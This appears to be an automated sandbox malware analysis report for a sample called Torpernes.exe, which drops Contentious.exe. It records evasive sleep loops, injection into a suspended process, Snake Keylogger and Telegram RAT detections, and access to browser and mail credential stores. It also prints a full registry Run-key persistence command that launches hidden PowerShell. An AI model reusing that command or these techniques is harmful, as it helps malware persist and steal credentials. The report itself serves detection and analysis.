Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594233	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594125	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6149	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Window / User API: threadDelayed 3788	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Window / User API: threadDelayed 6044	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

API coverage: 2.0 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7604	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7192	Thread sleep count: 3788 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7192	Thread sleep count: 6044 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599771s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599652s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599534s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599401s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -599062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598947s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598837s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598680s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598117s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597774s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597434s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -597101s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596327s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -596102s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595872s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595764s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595655s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595522s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595348s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -595075s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594233s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe TID: 7180	Thread sleep time: -594125s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_0040615C FindFirstFileW,FindClose,	0_2_0040615C
Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004056A1
Source: C:\Users\user\Desktop\Torpernes.exe	Code function: 0_2_00402770 FindFirstFileW,	0_2_00402770
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_0040615C FindFirstFileW,FindClose,	6_2_0040615C
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_00402770 FindFirstFileW,	6_2_00402770
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Code function: 6_2_004056A1 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_004056A1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599771	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599652	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599534	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599401	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598947	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598837	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598117	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597774	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597434	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 597101	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596327	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 596102	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595872	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595764	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595655	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595522	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595348	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 595075	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594233	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Thread delayed: delay time: 594125	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dcad4b8239f5aa<
Source: Contentious.exe, 00000006.00000002.2928735040.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Torpernes.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Torpernes.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

Process queried: DebugPort

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

6_2_00403B4F

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Torpernes.exe

Code function: 0_2_00406183 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406183

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Contentious.exe base: 1720000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Contentious.exe base: 19FFF4			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Contentious.exe "C:\Users\user\AppData\Local\Temp\Contentious.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "crisscrossing" /t REG_EXPAND_SZ /d "%Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "crisscrossing" /t reg_expand_sz /d "%isomerous% -windowstyle minimized $livsopsving=(get-itemproperty -path 'hkcu:\deponeringspladsen\').sknhedsplejes;%isomerous% ($livsopsving)"
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "crisscrossing" /t reg_expand_sz /d "%isomerous% -windowstyle minimized $livsopsving=(get-itemproperty -path 'hkcu:\deponeringspladsen\').sknhedsplejes;%isomerous% ($livsopsving)"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Contentious.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Torpernes.exe

Code function: 0_2_00405E3B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405E3B

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Contentious.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

Windows Analysis Report
Torpernes.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1481480
Product:	CloudBasic
Start time:	09:55:01
Start date:	25.07.2024
Sample:	Torpernes.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	ecc4ff0ee7d123f0e90587ea3a7b9ae3
SHA1:	70e6f747f9bae57619817beb11f836fa8a873726
SHA256:	1e0a46fd7b7b0706d4d5918ba666abdcccc67be4be89874b5cb2ca9ea8b12a83
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	106D01F562D751E62B702803895E93E0	CBF19C2392BDFA8C2209F8534616CCA08EE01A92	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
